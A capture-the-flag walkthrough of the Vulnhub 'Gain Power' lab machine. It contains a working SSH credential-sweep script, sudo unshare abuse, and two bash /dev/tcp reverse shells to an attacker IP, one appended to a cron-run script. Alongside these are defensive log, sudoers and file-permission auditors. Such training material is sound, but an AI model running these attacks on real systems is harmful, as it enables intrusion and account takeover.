Gain Power

Identify the target host's IP address

```
┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
 Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts

 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:05      1      60  Unknown vendor
 192.168.56.100  08:00:27:a1:99:30      1      60  PCS Systemtechnik GmbH
 192.168.56.254  08:00:27:57:a3:c2      1      60  PCS Systemtechnik GmbH
```

Using the netdiscover tool on Kali Linux, the target host's IP address is identified as 192.168.56.254.
Nmap scan

```
┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.254 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-01 09:14 EDT
Nmap scan report for bogon (192.168.56.254)
Host is up (0.00015s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 88416111e11f187dd60c38292579162c (RSA)
|   256 18c5fdcecd2b92f8d9171721249d67df (ECDSA)
|_  256 84c514e4e93321416a9272b9a7331aea (ED25519)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS))
|_http-title: Watch shop | eCommers
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.6 (CentOS)
8000/tcp open  http    Ajenti http control panel
|_http-title: Ajenti
MAC Address: 08:00:27:57:A3:C2 (Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.86 seconds
```

The Nmap scan shows that the target has three open ports: 22 (ssh), 80 (http) and 8000 (http, the Ajenti control panel).
Getting a shell

```
┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
└─$ nikto -h http://192.168.56.254/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.254
+ Target Hostname:    192.168.56.254
+ Target Port:        80
+ Start Time:         2023-05-01 09:17:44 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.6 (CentOS)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.4.6 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: POST, OPTIONS, GET, HEAD, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3092: /readme.txt: This might be interesting...
+ OSVDB-3268: /secret/: Directory indexing found.
+ OSVDB-3092: /secret/: This might be interesting...
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /login.html: Admin login page/section found.
+ OSVDB-3092: /test.php: This might be interesting...
+ 8725 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2023-05-01 09:18:38 (GMT-4) (54 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
```

nikto found the /secret directory. Browsing it, the image files it contains were downloaded to Kali Linux for analysis.
Analysing the images, however, yielded nothing meaningful.
```
└─$ ssh root@192.168.56.254
The authenticity of host '192.168.56.254 (192.168.56.254)' can't be established.
ED25519 key fingerprint is SHA256:1yR5iTL+oNBeYI7ACvh1p8CYWHrzXAiOC+CSijIO9uQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.254' (ED25519) to the list of known hosts.
Hi !!! THIS MESSAGE IS ONLY VISIBLE IN OUR NETWORK :)

 ___ _ ___ / __|__ _(_)_ _ | _ \_____ __ _____ _ _ | (_ / _` | | ' \ | _/ _ \ V V / -_) '_| \___\__,_|_|_||_| |_| \___/\_/\_/\___|_|

I HOPE EVERYONE KNOW THE JOINING ID CAUSE THAT IS YOUR USERNAME : ie : employee1 employee2 ... ... ... so on ;)
I already told the format of password of everyone in the yesterday's metting.
Now i have configured everything. My request is to everyone to Complete assignments on time
btw one of my employee have sudo powers because he is my favourite
NOTE : "This message will automatically removed after 2 days"
- BOSS
root@192.168.56.254's password:
```

Assume the username is employee1. From the author's hint in the banner, the password probably follows a pattern derived from the username, for example being identical to it.
The home directory contains the accounts coworker, helper and a series of employee users, and only one of the employees has sudo rights, so a script is needed to find out which employee it is.
```python
import paramiko
import sys
import time


class GainPowerCls:
    def __init__(self) -> None:
        self.host = '192.168.56.254'  # IP address of the virtual machine (target)
        print("Target: %s" % self.host)
        try:
            self.ssh_client = paramiko.SSHClient()
            # The lab host's key is not in known_hosts yet; accept it automatically.
            self.ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        except Exception as e:
            print("Something is wrong: %s" % e)
            sys.exit()

    def run_sudo(self, username, password):
        try:
            print('Attempt to access by %s: %s' % (username, password))
            self.ssh_client.connect(hostname=self.host, username=username, password=password)
            # The underlying Transport for this SSH connection; it lets us open
            # specific kinds of channels instead of using exec_command() directly.
            transport = self.ssh_client.get_transport()
            # Request a new channel of type "session" (an alias for open_channel("session")).
            session = transport.open_session()
            # Combine stderr into stdout on this channel (the default is False).
            session.set_combine_stderr(True)
            # Request a pseudo-terminal: without a tty sudo refuses to prompt for
            # the password, so the prompt could not be answered over stdin below.
            session.get_pty()
            session.exec_command('sudo -l')
            stdin = session.makefile('wb', -1)
            stdout = session.makefile('rb', -1)
            stdin.write(password + '\n')  # answer the "[sudo] password for ..." prompt
            stdin.flush()
            print(stdout.read().decode('utf-8'))
            session.close()
        except Exception as e:
            # A failed login for one account must not abort the whole sweep,
            # so report the error and move on to the next username.
            print(e)
        finally:
            self.ssh_client.close()

    def run(self):
        for i in range(1, 101):
            username = 'employee' + str(i)
            password = 'employee' + str(i)
            self.run_sudo(username, password)
            print('*' * 150)
            time.sleep(1)


if __name__ == '__main__':
    client = GainPowerCls()
    client.run()
```
Running the Python script above shows that employee64 has sudo rights:

```
employee64
[sudo] password for employee64: 
Matching Defaults entries for employee64 on localhost:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
    env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
    env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
    env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User employee64 may run the following commands on localhost:
    (programmer) /usr/bin/unshare
******************************************************************************************************************************************************
```
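The sweep above logs in to dozens of accounts from one source address within a few seconds, and because the password pattern is guessable every attempt produces an sshd "Accepted password" line rather than a failure, so a detection that only counts failed logins misses it entirely. As an added example (not part of the original write-up), the following Python parses sshd lines in the CentOS /var/log/secure format and alerts on any source that authenticates as many distinct accounts inside a sliding time window. The log lines are constructed for this example, and the window and account thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample in the CentOS /var/log/secure sshd format. These lines are
# invented for this example; they are not log data taken from the box.
SAMPLE_SECURE_LOG = """\
May  1 22:30:01 localhost sshd[25001]: Accepted password for employee1 from 192.168.56.206 port 50110 ssh2
May  1 22:30:02 localhost sshd[25004]: Accepted password for employee2 from 192.168.56.206 port 50112 ssh2
May  1 22:30:03 localhost sshd[25007]: Accepted password for employee3 from 192.168.56.206 port 50114 ssh2
May  1 22:30:04 localhost sshd[25010]: Failed password for employee4 from 192.168.56.206 port 50116 ssh2
May  1 22:30:05 localhost sshd[25013]: Accepted password for employee5 from 192.168.56.206 port 50118 ssh2
May  1 22:30:06 localhost sshd[25016]: Accepted password for employee6 from 192.168.56.206 port 50120 ssh2
May  1 22:31:10 localhost sshd[25040]: Accepted publickey for coworker from 192.168.56.10 port 40022 ssh2
May  1 22:35:00 localhost sshd[25060]: Accepted password for helper from 192.168.56.10 port 40030 ssh2
"""

# One sshd authentication result line: timestamp, outcome, user and source address.
SSHD_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) \w+ for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


def parse_sshd_log(text, year=2023):
    """Return (timestamp, source_ip, username, result) for every sshd auth line.
    syslog timestamps carry no year, so the caller supplies it."""
    events = []
    for line in text.splitlines():
        m = SSHD_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            events.append((ts, m["src"], m["user"], m["result"]))
    return events


def detect_account_sweeps(events, window_seconds=300, min_accounts=5):
    """Return {source_ip: distinct_accounts} for every source that authenticated
    (successfully or not) as at least `min_accounts` different users within any
    `window_seconds` window. Successful logins are counted on purpose: a sweep
    with a guessable password pattern produces 'Accepted', not 'Failed'."""
    by_src = defaultdict(list)
    for ts, src, user, _result in sorted(events):
        by_src[src].append((ts, user))
    alerts = {}
    for src, seq in by_src.items():
        lo = 0
        for hi in range(len(seq)):
            # Slide the window start forward until it spans at most window_seconds.
            while (seq[hi][0] - seq[lo][0]).total_seconds() > window_seconds:
                lo += 1
            distinct = len({user for _, user in seq[lo:hi + 1]})
            if distinct >= min_accounts:
                alerts[src] = max(alerts.get(src, 0), distinct)
    return alerts


if __name__ == "__main__":
    for src, n in detect_account_sweeps(parse_sshd_log(SAMPLE_SECURE_LOG)).items():
        print(f"ALERT: {src} authenticated as {n} distinct accounts within 5 minutes")
```

On the constructed sample only 192.168.56.206 trips the rule (six accounts in five seconds); the two legitimate logins from 192.168.56.10 do not. The underlying fix is of course the password policy: usernames that double as passwords make the sweep succeed, so the alert is a compensating control, not a substitute.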
```
┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
└─$ ssh employee64@192.168.56.254
Hi !!! THIS MESSAGE IS ONLY VISIBLE IN OUR NETWORK :)

 ___ _ ___ / __|__ _(_)_ _ | _ \_____ __ _____ _ _ | (_ / _` | | ' \ | _/ _ \ V V / -_) '_| \___\__,_|_|_||_| |_| \___/\_/\_/\___|_|

I HOPE EVERYONE KNOW THE JOINING ID CAUSE THAT IS YOUR USERNAME : ie : employee1 employee2 ... ... ... so on ;)
I already told the format of password of everyone in the yesterday's metting.
Now i have configured everything. My request is to everyone to Complete assignments on time
btw one of my employee have sudo powers because he is my favourite
NOTE : "This message will automatically removed after 2 days"
- BOSS
employee64@192.168.56.254's password: 
Permission denied, please try again.
employee64@192.168.56.254's password: 
Last failed login: Mon May  1 22:34:48 EDT 2023 from 192.168.56.206 on ssh:notty
There was 1 failed login attempt since the last successful login.
Last login: Mon May  1 22:30:52 2023 from 192.168.56.206
[employee64@localhost ~]$ id
uid=1063(employee64) gid=1063(employee64) groups=1063(employee64) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
```

The sudo rule lets employee64 run unshare as programmer. unshare executes whatever program it is given (here bash, in its own namespace), so this yields a shell as programmer:

```
[employee64@localhost ~]$ sudo -u programmer /usr/bin/unshare /bin/bash
[sudo] password for employee64: 
bash-4.2$ id
uid=1182(programmer) gid=1184(prome) groups=1184(prome) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
bash-4.2$ 
```

We now have a shell as programmer.
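The `sudo -l` result is the finding an administrator should catch when reviewing sudoers: unshare's whole job is to run the program it is handed, so `(programmer) /usr/bin/unshare` is a shell as programmer by another name. As an added example (not code from the write-up), the following Python parses `sudo -l` style output and flags every rule whose command is `ALL` or a program launcher. The second sample rule (a constructed systemctl grant) and the launcher list are this example's own assumptions, added to exercise the NOPASSWD and multi-command syntax.

```python
import re

# Binaries whose purpose is to launch another program, so a sudo rule granting
# one of them is equivalent to granting a shell as the run-as user. Illustrative
# list (an assumption of this example), not an exhaustive one.
PROGRAM_LAUNCHERS = {"unshare", "nsenter", "env", "bash", "sh", "dash", "su"}

# Constructed `sudo -l` output. The unshare rule is the one found on this box;
# the systemctl rule is invented here to show NOPASSWD and comma-separated commands.
SAMPLE_SUDO_L = """\
Matching Defaults entries for employee64 on localhost:
    !visiblepw, always_set_home, match_group_by_gid, env_reset

User employee64 may run the following commands on localhost:
    (programmer) /usr/bin/unshare
    (root) NOPASSWD: /usr/bin/systemctl restart httpd, /usr/bin/systemctl status httpd
"""

# "(runas_user[ : runas_group]) [TAG: ...] command[, command...]"
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>\S.*)$")


def parse_sudo_l(text):
    """Return one dict per command from the rule lines that follow
    'may run the following commands'; Defaults lines are skipped."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        runas_user = m["runas"].split(":")[0].strip()
        tags = {t.strip() for t in m["tags"].split(":") if t.strip()}
        for cmd in m["cmds"].split(", "):
            rules.append({"runas": runas_user,
                          "nopasswd": "NOPASSWD" in tags,
                          "command": cmd.strip()})
    return rules


def audit_sudo_rules(rules):
    """Return the rules that hand the caller an arbitrary program as the run-as
    user: an unrestricted ALL, or a binary whose argument is the program to run."""
    findings = []
    for rule in rules:
        program = rule["command"].split()[0]
        base = program.rsplit("/", 1)[-1]
        if rule["command"] == "ALL" or base in PROGRAM_LAUNCHERS:
            findings.append(rule)
    return findings


if __name__ == "__main__":
    for rule in audit_sudo_rules(parse_sudo_l(SAMPLE_SUDO_L)):
        print(f"FINDING: '{rule['command']}' as {rule['runas']} "
              f"is an arbitrary shell as {rule['runas']}")
```

On the sample the unshare rule is reported and the systemctl rule is not, which is the distinction that matters: a grant should name a specific program with its fixed arguments, never a program whose arguments are themselves a command line.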
```
bash-4.2$ pwd
/media/programmer/scripts
bash-4.2$ cat backup.sh 
#!/bin/bash
cp /var/www/html/thisiscarddetails.txt /tmp/back.txt
```

There is a script in /media/programmer/scripts that is executed periodically.
Upload the pspy64 tool to /tmp on the target host:

```
bash-4.2$ cd /tmp
bash-4.2$ wget http://192.168.56.206:8000/pspy64
--2023-05-01 22:42:29--  http://192.168.56.206:8000/pspy64
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’

100%[====================================================================================>] 3,104,768   --.-K/s   in 0.01s   

2023-05-01 22:42:29 (235 MB/s) - ‘pspy64’ saved [3104768/3104768]

bash-4.2$ chmod +x pspy64
```

```
2023/05/01 22:44:01 CMD: UID=1183 PID=25118 | /bin/bash /media/programmer/scripts/backup.sh
```

This shows that backup.sh is run periodically by the user with UID 1183.
Checking /etc/passwd, UID 1183 belongs to the user vanshal.

```
bash-4.2$ ls -alh
total 4.0K
drwxr-xr-x. 2 programmer prome 23 May 18  2020 .
drwxrwx---. 3 programmer prome 21 Aug  8  2019 ..
-rwxr-xr-x. 1 programmer prome 65 May 18  2020 backup.sh
```

The programmer user owns backup.sh and therefore has write permission on it, even though the script runs as vanshal.
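What makes backup.sh abusable is not any single bit in the listing above but the mismatch: the script and its directory are owned and writable by programmer, while pspy shows the job executing as uid 1183 (vanshal). As an added example rather than code from the write-up, the following Python converts the `ls -l` mode strings from that listing into permission bits and reports every principal other than root or the executing user who can modify the script, or replace it through a writable parent directory. The uid/gid numbers are the ones printed by `id` on this box; the Principal and FileInfo structures are this example's own.

```python
import stat
from dataclasses import dataclass
from typing import FrozenSet, List

# Numeric ids as printed by `id` on the box: programmer, vanshal and the prome group.
PROGRAMMER_UID, VANSHAL_UID, PROME_GID = 1182, 1183, 1184

# Permission flags in the order the nine characters of an ls mode string appear.
PERM_FLAGS = (
    stat.S_IRUSR, stat.S_IWUSR, stat.S_IXUSR,
    stat.S_IRGRP, stat.S_IWGRP, stat.S_IXGRP,
    stat.S_IROTH, stat.S_IWOTH, stat.S_IXOTH,
)


@dataclass(frozen=True)
class Principal:
    uid: int
    gids: FrozenSet[int]


@dataclass(frozen=True)
class FileInfo:
    path: str
    uid: int
    gid: int
    mode: int  # permission bits only, as parse_mode() returns them


def parse_mode(ls_mode: str) -> int:
    """Convert an `ls -l` mode string such as '-rwxr-xr-x.' into permission bits.
    The trailing '.' or '+' (SELinux context / ACL marker) is ignored; 's'/'t'
    set the execute bit plus setuid/setgid/sticky, 'S'/'T' only the latter."""
    perms = ls_mode[1:10]
    if len(perms) != 9:
        raise ValueError(f"not an ls -l mode string: {ls_mode!r}")
    bits = 0
    for i, (ch, flag) in enumerate(zip(perms, PERM_FLAGS)):
        if ch in "rwxst":
            bits |= flag
        if i == 2 and ch in "sS":
            bits |= stat.S_ISUID
        elif i == 5 and ch in "sS":
            bits |= stat.S_ISGID
        elif i == 8 and ch in "tT":
            bits |= stat.S_ISVTX
    return bits


def foreign_writers(f: FileInfo, runner: Principal) -> List[str]:
    """Describe every way a principal other than root or `runner` can modify `f`."""
    issues = []
    if f.mode & stat.S_IWUSR and f.uid not in (0, runner.uid):
        issues.append(f"{f.path}: owner uid {f.uid} is not the executing uid {runner.uid} but can write")
    if f.mode & stat.S_IWGRP and f.gid != 0:
        issues.append(f"{f.path}: every member of gid {f.gid} can write")
    if f.mode & stat.S_IWOTH:
        issues.append(f"{f.path}: world-writable")
    return issues


def audit_scheduled_script(script: FileInfo, parent_dirs: List[FileInfo],
                           runner: Principal) -> List[str]:
    """A scheduled script is only as trustworthy as the least-trusted writer of
    the file or of any directory on its path: a writable directory lets the file
    be renamed away and replaced even when the file itself is read-only."""
    findings = foreign_writers(script, runner)
    for d in parent_dirs:
        findings += foreign_writers(d, runner)
    return findings


# Values from the `ls -alh` output above: backup.sh and its directory ('.') are
# programmer:prome, the parent /media/programmer ('..') is group-writable, and
# pspy showed the job running as uid 1183.
BACKUP_SH = FileInfo("/media/programmer/scripts/backup.sh", PROGRAMMER_UID, PROME_GID, parse_mode("-rwxr-xr-x."))
SCRIPTS_DIR = FileInfo("/media/programmer/scripts", PROGRAMMER_UID, PROME_GID, parse_mode("drwxr-xr-x."))
PROGRAMMER_DIR = FileInfo("/media/programmer", PROGRAMMER_UID, PROME_GID, parse_mode("drwxrwx---."))
VANSHAL = Principal(VANSHAL_UID, frozenset({PROME_GID}))

if __name__ == "__main__":
    for line in audit_scheduled_script(BACKUP_SH, [SCRIPTS_DIR, PROGRAMMER_DIR], VANSHAL):
        print("FINDING:", line)
```

Run against the box's values it reports four problems: programmer can write the script and its directory, and the prome group (which also contains vanshal) can write the parent directory. The fix is to make the file and every directory on its path owned by the executing account or by root, mode 0755 or tighter, with no group or world write bit.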
```
bash-4.2$ echo 'bash -i >& /dev/tcp/192.168.56.206/5555 0>&1' >> backup.sh
```

```
┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
└─$ sudo nc -nlvp 5555 
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 51130
bash: no job control in this shell
[vanshal@localhost ~]$ id
id
uid=1183(vanshal) gid=1184(prome) groups=1184(prome) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
You have mail in /var/mail/vanshal
```

After a short wait, the scheduled run of backup.sh hands us a shell as vanshal.
```
[vanshal@localhost ~]$ cat local.txt
cat local.txt
░██████╗░░█████╗░██╗███╗░░██╗ ██████╗░░█████╗░░██╗░░░░░░░██╗███████╗██████╗░ ██╔════╝░██╔══██╗██║████╗░██║ ██╔══██╗██╔══██╗░██║░░██╗░░██║██╔════╝██╔══██╗ ██║░░██╗░███████║██║██╔██╗██║ ██████╔╝██║░░██║░╚██╗████╗██╔╝█████╗░░██████╔╝ ██║░░╚██╗██╔══██║██║██║╚████║ ██╔═══╝░██║░░██║░░████╔═████║░██╔══╝░░██╔══██╗ ╚██████╔╝██║░░██║██║██║░╚███║ ██║░░░░░╚█████╔╝░░╚██╔╝░╚██╔╝░███████╗██║░░██║ ░╚═════╝░╚═╝░░╚═╝╚═╝╚═╝░░╚══╝ ╚═╝░░░░░░╚════╝░░░░╚═╝░░░╚═╝░░╚══════╝╚═╝░░╚═╝
You successfully owned the user of this box :-)
Best of Luck for the root flag: 5c2a29d7b95868da9e503502f301e8dd
Twitter : VanshalG
```

That is the user flag.
The home directory also contains a file secret.zip; download it to Kali Linux.
```
┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
└─$ wget http://192.168.56.254:9999/secret.zip
--2023-05-01 22:52:19--  http://192.168.56.254:9999/secret.zip
Connecting to 192.168.56.254:9999... connected.
HTTP request sent, awaiting response... 200 OK
Length: 439 [application/zip]
Saving to: ‘secret.zip’

secret.zip          100%[=====================================================>]     439  --.-KB/s    in 0s      

2023-05-01 22:52:19 (1.52 MB/s) - ‘secret.zip’ saved [439/439]
```

```
┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
└─$ unzip secret.zip 
Archive:  secret.zip
[secret.zip] Mypasswords.txt password: 

┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
└─$ zip2john secret.zip > secret_hash
ver 2.0 efh 5455 efh 7875 secret.zip/Mypasswords.txt PKZIP Encr: TS_chk, cmplen=243, decmplen=257, crc=BC7A971B ts=7F46 cs=7f46 type=8

┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt secret_hash 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
81237900         (secret.zip/Mypasswords.txt)     
1g 0:00:00:00 DONE (2023-05-01 22:53) 6.250g/s 4480Kp/s 4480Kc/s 4480KC/s AnThOnY..741210
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 
```

The archive is password-protected; zip2john and john with the rockyou wordlist recover its password (81237900) almost instantly.
```
┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
└─$ unzip secret.zip
Archive:  secret.zip
[secret.zip] Mypasswords.txt password: 
  inflating: Mypasswords.txt         

┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
└─$ cat Mypasswords.txt 
aTQ!vYxQUh3$&uaN3p%@_ax#Ab2XNZ!5$rFh$@bDMyxt#&Q2L&4+DvDT?A!MPKK9sFq-V8_d$5gQLKyKhf-4&S=_m^Cx?bZYf8Bv%%*H^GcvDc4ayfPk^HWs8bnD%Ayk3$5WP6_K?a6_%MF&e-DS2ZZ$m93BL3CY!huQDM2-JZcMSMKT8K*Z7zLPGATU7JP&x#JtaZHAbM^%$TK%C3ubXV4#e87M6P-puXTTMbzuP5y4qX6Uzd%ed8Ux_vMX=pCB
```

With the password above we can log in to the Ajenti panel on port 8000 as the user root.
The panel includes a web terminal that can run any command, so a reverse shell is launched from it:
```
bash -i >& /dev/tcp/192.168.56.206/8888 0>&1
```

```
┌──(kali㉿kali)-[~/Vulnhub/Gainpower]
└─$ sudo nc -nlvp 8888 
[sudo] password for kali: 
listening on [any] 8888 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.254] 45550
[root@localhost /]# id
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
[root@localhost /]# cd /root
cd /root
[root@localhost root]# ls -alh
ls -alh
total 28K
dr-xr-x---.  3 root root  132 Jun 21  2020 .
dr-xr-xr-x. 18 root root  240 Aug  7  2019 ..
-rw-r--r--.  1 root root   18 Dec 28  2013 .bash_logout
-rw-r--r--.  1 root root  176 Dec 28  2013 .bash_profile
-rw-r--r--.  1 root root  176 Dec 28  2013 .bashrc
-rw-r--r--.  1 root root  100 Dec 28  2013 .cshrc
drwxr-----.  3 root root   19 Aug  7  2019 .pki
-rw-r--r--.  1 root root 2.1K May 18  2020 proof.txt
-rw-------.  1 root root 1.0K Aug  7  2019 .rnd
-rw-r--r--.  1 root root  129 Dec 28  2013 .tcshrc
[root@localhost root]# cat proof.txt
cat proof.txt
░██████╗░░█████╗░██╗███╗░░██╗ ██████╗░░█████╗░░██╗░░░░░░░██╗███████╗██████╗░ ██╔════╝░██╔══██╗██║████╗░██║ ██╔══██╗██╔══██╗░██║░░██╗░░██║██╔════╝██╔══██╗ ██║░░██╗░███████║██║██╔██╗██║ ██████╔╝██║░░██║░╚██╗████╗██╔╝█████╗░░██████╔╝ ██║░░╚██╗██╔══██║██║██║╚████║ ██╔═══╝░██║░░██║░░████╔═████║░██╔══╝░░██╔══██╗ ╚██████╔╝██║░░██║██║██║░╚███║ ██║░░░░░╚█████╔╝░░╚██╔╝░╚██╔╝░███████╗██║░░██║ ░╚═════╝░╚═╝░░╚═╝╚═╝╚═╝░░╚══╝ ╚═╝░░░░░░╚════╝░░░░╚═╝░░░╚═╝░░╚══════╝╚═╝░░╚═╝
_________ __ .__ __ .__ \_ ___ \ ____ ____ ________________ _/ |_ __ __| | _____ _/ |_|__| ____ ____ / \ \/ / _ \ / \ / ___\_ __ \__ \\ __\ | \ | \__ \\ __\ |/ _ \ / \ \ \___( ) | \/ /_/ > | \// __ \| | | | / |__/ __ \| | | ( ) | \ \______ /\____/|___| /\___ /|__| (____ /__| |____/|____(____ /__| |__|\____/|___| / \/ \//_____/ \/ \/ \/
You successfully owned the root of this box :-)
Flag: eb2e174c3883ff6b5fd871167795b4d6
Twitter : VanshalG
[root@localhost root]# 
```

STRIVE FOR PROGRESS, NOT FOR PERFECTION